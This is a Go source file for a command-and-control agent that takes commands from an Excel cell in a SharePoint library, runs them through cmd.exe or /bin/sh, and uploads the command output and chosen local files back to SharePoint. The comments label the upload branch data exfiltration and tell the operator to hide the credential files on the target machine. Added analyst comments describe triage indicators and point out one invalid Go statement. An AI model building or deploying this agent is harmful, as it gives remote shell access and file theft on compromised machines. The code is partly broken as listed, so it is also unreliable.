c2point.go
package main
import (
"fmt"
"time"
"log"
"io/ioutil"
"os/exec"
"os"
"strings"
"path/filepath"
"runtime"
"github.com/koltyakov/gosip"
"github.com/koltyakov/gosip/api"
"github.com/tealeg/xlsx/v3"
strategy "github.com/koltyakov/gosip/auth/azurecert"
)
// main authenticates to SharePoint Online with a certificate-based Azure app
// identity and then polls a workbook on the site in an endless loop: it reads
// the value of the first cell, treats it as an instruction, and writes the
// result back to the same document library.
//
// Analyst summary of what the visible code does:
//   - reads credentials from "private.json" in the working directory;
//   - downloads the command workbook on every iteration;
//   - "exitc2" in the cell ends the loop;
//   - a cell value starting with "upload" copies a local file to the library;
//   - any other value is passed verbatim to cmd.exe /c or /bin/sh -c;
//   - the command's standard output is written to "output.xlsx" on the site.
//
// Every error path calls log.Fatal/log.Fatalf, so any failure (network,
// parse, non-zero exit of the child process) terminates the process.
//
// Observable artefacts: the credential files next to the binary, a transient
// "temp.xlsx" in the working directory, shell child processes whose command
// line carries the cell content, and repeated download/upload requests to a
// single SharePoint library made under the application's identity.
func main() {
// ++++++ Auth on Azure
//
// The only Auth supported for accessing SPOL is through certificate
//
// Create a self-signed cert, upload .cer on Azure Auth of your apps like explained in README.md
// Use cert .pfx file and private.json in same folder of executable, after compiling
// HIDING THE .pfx and .json FILES ON TARGET MACHINE IS IN YOUR SCOPE
//
// NOTE(review): both files are credential material for the Azure app; their
// presence beside an unknown executable is a useful triage indicator.
authCnfg := &strategy.AuthCnfg{}
// Relative path: resolved against the process working directory.
configPath := "private.json"
if err := authCnfg.ReadConfig(configPath); err != nil {
log.Fatalf("Unable to get config: %v", err)
}
client := &gosip.SPClient{AuthCnfg: authCnfg}
sp := api.NewSP(client)
// Connectivity check: fetch only the site's Title and print it to stdout.
res, err := sp.Web().Select("Title").Get()
if err != nil {
log.Fatal(err)
}
fmt.Printf("Site title: %s\n", res.Data().Title)
// +++++ SET HERE YOUR FILENAME ON SHAREPOINT THAT CONTAINS THE COMMAND
fileName := "yourcommand.xlsx"
// +++++ SET HERE YOUR SHAREPOINT PATH
fileRelativeURL := "/sites/yoursite/Shared Documents/" + fileName
// +++++ SET HERE YOUR OUTPUT PATH
outFile := "output.xlsx"
fileOutputURL := "/sites/yoursite/Shared Documents/" + outFile
// Main Loop: reads - downloads - executes - uploads - sleeps
// The only exits are the "exitc2" value below and a fatal error.
for {
// The command workbook is downloaded in full on every iteration.
file, err := sp.Web().GetFile(fileRelativeURL).Download()
if err != nil {
log.Fatalf("Unable to get Excel file: %v", err)
}
// Handle on the library that receives both uploaded files and command output.
folder := sp.Web().GetFolder("Shared Documents")
// Open Excel file
xlFile, err := xlsx.OpenBinary(file)
if err != nil {
log.Fatalf("Unable to open Excel file: %v", err)
}
// Only the first sheet of the workbook is consulted.
sheet := xlFile.Sheets[0]
// Cell A1 value (row 0, column 0) carries the instruction.
cell, err := sheet.Cell(0, 0)
if err != nil {
log.Fatalf("Unable to read cell: %v", err)
}
cellValue := cell.Value
// Kill switch: exitc2
if cellValue == "exitc2" {
fmt.Println("[C2] Agent Termination Command Received")
break
}
// data exfiltration
// Triggered by any cell value that starts with "upload"; the local path is
// the second ";"-separated field.
if strings.HasPrefix(cellValue, "upload") {
splittedCellValue := strings.Split(cellValue, ";")
fileToUpload := splittedCellValue[1]
// The whole local file is read into memory before being sent.
content2, err := ioutil.ReadFile(fileToUpload)
if err != nil {
log.Fatal(err)
}
// Only the base name is kept, so the file lands at the library root and
// (third argument true) overwrites an existing file of the same name.
fileName := filepath.Base(fileToUpload)
fileAddResp2, err := folder.Files().Add(fileName,content2,true)
if err != nil {
log.Fatal(err)
}
time.Sleep(1 * time.Second)
fmt.Printf("[Command Executed] Upload of file: %s\n",fileToUpload)
fmt.Printf("[Command Executed] Output file URL: %s\n", fileAddResp2.Data().ServerRelativeURL)
// This branch waits about 16 seconds in total before the next poll.
time.Sleep(15 * time.Second)
continue
}
fmt.Println("[C2] Command Requested: " + cellValue)
// exec command - platform aware
// The cell content is handed to the platform shell unmodified, so the shell
// appears as a child process with the cell text on its command line.
var cmd *exec.Cmd
if runtime.GOOS == "windows" {
cmd = exec.Command("cmd.exe", "/c", cellValue)
} else {
cmd = exec.Command("/bin/sh", "-c", cellValue)
}
// Output captures standard output only; a non-zero exit status is returned as
// an error and ends the process via log.Fatalf.
output, err := cmd.Output()
if err != nil {
log.Fatalf("Error in command execution: %v", err)
}
// output print into temp excel file
// Row 0, column 1 (B1) of the downloaded workbook receives the output.
newCell, err := sheet.Cell(0, 1)
if err != nil {
log.Fatalf("Unable to access cell: %v",err)
}
newCell.SetValue(string(output))
// temporary local save and upload on Sharepoint the output of the command
// "temp.xlsx" is written to the working directory and removed further down.
if err := xlFile.Save("temp.xlsx"); err != nil {
log.Fatalf("Error in excel save: %v", err)
}
content, err := ioutil.ReadFile("temp.xlsx")
if err != nil {
log.Fatal(err)
}
// Check-in with an empty comment and type 2; the call's result is discarded.
sp.Web().GetFile(fileOutputURL).CheckIn("",2) //locks output file in overwrite mode
fileAddResp, err := folder.Files().Add("output.xlsx",content,true)
if err != nil {
log.Fatal(err)
}
time.Sleep( 1 * time.Second)
// NOTE(review): CheckOut is referenced here without call parentheses, so no
// check-out request is made; as listed, this statement is not valid Go.
sp.Web().GetFile(fileOutputURL).CheckOut //release lock
if err := os.Remove("temp.xlsx"); err != nil{
log.Fatal(err)
}
fmt.Printf("[Command Executed] New file URL: %s\n", fileAddResp.Data().ServerRelativeURL)
// No further delay on this path: the next poll follows the one-second sleep
// above, and an unchanged cell value is executed again on each iteration.
}
}